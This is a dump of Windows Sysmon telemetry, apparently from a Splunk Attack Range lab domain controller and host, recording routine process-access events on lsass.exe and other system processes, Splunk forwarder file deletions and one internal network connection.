09:22:18.463{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.463{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.463{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.213{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8D4A-6151-A100-00000000FD01}5976C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.213{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D4A-6151-A100-00000000FD01}5976C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.198{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D4A-6151-A100-00000000FD01}5976C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.198{5EBD8912-8CBD-6151-0A00-00000000FD01}624684C:\Windows\system32\services.exe{5EBD8912-8D4A-6151-A100-00000000FD01}5976C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.198{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.198{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.198{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.120{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=852A8805A48A41866F678AC017569F73,SHA256=F10DBBC346CB15EF485480BAC1708BD5056306ABB9DEE0842C5B7B412B57C8F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.073{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.073{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.073{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.010{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+1969|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.010{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\ncbservice.dll+165c|c:\windows\system32\ncbservice.dll+227a|c:\windows\system32\ncbservice.dll+205e|c:\windows\system32\ncbservice.dll+1bdb|c:\windows\system32\ncbservice.dll+181b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.010{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+17cf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:18.010{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000980946Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:16.805{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59523-false10.0.1.12-8000- 23542300x8000000000000000980945Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:19.331{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E7E234B25D6F10E31D86FBCAA54F50C,SHA256=8FD32DDF04470C92D85ABA670BCB149968A8561826215F22C6524EDF87F01756,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.604{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=B2696F5D84716874227CFEBF904CF1BB,SHA256=46DB7567515D9D922875B1B8EF90A4D5A0717E510A9273D7C5E1A308904799B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.589{5EBD8912-8D4A-6151-A300-00000000FD01}60886128C:\Windows\system32\sppsvc.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d719|C:\Windows\system32\sppsvc.exe+7eaa8|C:\Windows\system32\sppsvc.exe+748f0|C:\Windows\system32\sppsvc.exe+957de|C:\Windows\system32\sppsvc.exe+5454f|C:\Windows\system32\sppsvc.exe+a1cdb|C:\Windows\system32\sppsvc.exe+b414a|C:\Windows\system32\sppsvc.exe+b443f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4 10341000x80000000000000001056198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.589{5EBD8912-8D4A-6151-A300-00000000FD01}60886128C:\Windows\system32\sppsvc.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d719|C:\Windows\system32\sppsvc.exe+74a0a|C:\Windows\system32\sppsvc.exe+95791|C:\Windows\system32\sppsvc.exe+5454f|C:\Windows\system32\sppsvc.exe+a1cdb|C:\Windows\system32\sppsvc.exe+b414a|C:\Windows\system32\sppsvc.exe+b443f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.557{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E969A8FBEDF5AB0349B688E00BC89635,SHA256=ED2217A2D0B8CCBEF2D8F1F815AD99B96823D1796354B6DF29D2D4AA4518DD50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.464{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=6EDC237464D85E3B7E8C89E63CBD132E,SHA256=D6E0910A80DDA4F92AFBA19C7348D5B713329425C0F6B49F48280F605F2F336E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.432{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.432{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.432{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNE